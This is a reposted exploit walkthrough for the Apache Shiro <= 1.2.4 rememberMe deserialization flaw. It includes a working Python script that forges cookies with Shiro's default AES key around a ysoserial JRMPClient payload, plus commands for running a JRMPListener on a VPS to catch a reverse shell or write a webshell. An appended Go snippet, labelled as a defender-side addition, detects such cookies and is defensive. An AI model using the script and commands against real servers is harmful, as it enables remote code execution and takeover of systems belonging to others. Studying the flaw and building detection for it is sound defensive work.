Affected version
Apache Shiro <= 1.2.4
Components used
commons-collections4 (org.apache.commons); in theory commons-collections2 also works
Location used
The rememberMe value in the Cookie header of any HTTP request
Difficulties in building the environment
Building Shiro with the maven compiler has a lot of pitfalls and was painful enough that I list the main ones here:
1. mvn and svn must be installed on the machine
2. JDK 1.6 is recommended
3. Maven 3.1.1 is the best version
With the points above addressed, the build basically will not fail.
If you still fail to compile and are not confident, you can use the war package I provide:
https://pan.baidu.com/s/1dSHR21IQbrLHpaSQ1TI23A extraction code: zg4h
Deploying the war package is very simple: just put it in the tomcat webapps directory and it will be unpacked automatically. Its default name is samples-web-1.2.4; to make access easier we can rename it to shiro.
Usage steps
Environment preparation
You need to place ysoserial on a VPS reachable from the public network; it is used together with the following python script.
shiro_exp_payload.py
import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES  # pycryptodome


def encode_rememberme(command):
    # Let ysoserial produce the serialized JRMPClient object pointing at the listener.
    popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'JRMPClient', command],
                             stdout=subprocess.PIPE)
    BS = AES.block_size
    # PKCS#7 padding to a whole number of AES blocks, which is what Shiro expects.
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    # Shiro's hard-coded default rememberMe key, the root cause of this issue:
    # any deployment still using it accepts cookies encrypted under it.
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
    iv = uuid.uuid4().bytes
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    # Cookie layout Shiro reads back: base64(IV || AES-CBC ciphertext).
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext


if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])
    print("rememberMe={0}".format(payload.decode()))
Executing the command
1. First, this walkthrough uses a reverse shell.
2. Run the following command on the VPS: java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 "反弹shell的命令"
The quoted argument is the reverse shell command; it must be written in the Java Runtime bash encoding. CommonsCollections4 can also be replaced with CommonsCollections2.
3. Run the python script: python shiro_exp_payload.py vpsip:1099
The python script generates a cookie; put that cookie into your HTTP request to receive the reverse shell,
as shown in the figure below.
(I use a reverse shell here; of course you can also use echo to write a webshell or similar, simply by replacing the reverse shell command with the command that writes the shell.)
The path to write the shell to can be found by referring to the figure below.
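As an added defender-side example (not part of the original post or of Shiro itself): the cookie layout the script above produces, base64(IV || AES-CBC(key, PKCS#7(data))), is what a WAF or log-review rule can check by decrypting an incoming rememberMe under the shipped default key and looking for the Java serialization header; a hit means the deployment still runs that key or the cookie was forged, and the remedy is to configure a unique, randomly generated cipherKey. It is written in Go so it runs on the standard library alone; the function names and the stub plaintext are the example's own assumptions.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"errors"
)

// DefaultKey is the hard-coded rememberMe key that Shiro <= 1.2.4 ships with,
// the same base64 value the script above embeds.
const DefaultKey = "kPH+bIxk5D2deZiIxcaaaA=="

// JavaMagic is the stream header (0xACED0005) every Java ObjectOutputStream
// emits, so it is the first thing a decrypted rememberMe must start with.
var JavaMagic = []byte{0xac, 0xed, 0x00, 0x05}

// DecryptRememberMe reverses base64(IV || AES-CBC(key, PKCS#7(data))).
// A wrong key almost always yields malformed padding, reported as an error.
func DecryptRememberMe(keyB64, cookie string) ([]byte, error) {
	key, err := base64.StdEncoding.DecodeString(keyB64)
	if err != nil {
		return nil, err
	}
	raw, err := base64.StdEncoding.DecodeString(cookie)
	if err != nil || len(raw) < 2*aes.BlockSize || len(raw)%aes.BlockSize != 0 {
		return nil, errors.New("cookie is not a well-formed IV+ciphertext")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	plain := make([]byte, len(raw)-aes.BlockSize)
	cipher.NewCBCDecrypter(block, raw[:aes.BlockSize]).CryptBlocks(plain, raw[aes.BlockSize:])
	// Validate PKCS#7 padding: last byte n in 1..16 and the last n bytes all equal n.
	n := int(plain[len(plain)-1])
	if n == 0 || n > aes.BlockSize || !bytes.Equal(plain[len(plain)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad padding: not encrypted under this key")
	}
	return plain[:len(plain)-n], nil
}

// UsesDefaultKey is the check a WAF or SOC rule applies to an incoming rememberMe:
// a cookie that decrypts under the shipped key to a Java serialization stream means
// the server still runs the default key or the cookie was forged; reject it and rotate the key.
func UsesDefaultKey(cookie string) bool {
	plain, err := DecryptRememberMe(DefaultKey, cookie)
	return err == nil && bytes.HasPrefix(plain, JavaMagic)
}
```

Feed UsesDefaultKey the raw rememberMe value from a request log; a cookie issued by a server with a rotated key, or any garbage value, returns false.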
Reproduced from: https://www.jianshu.com/p/c0cb65667145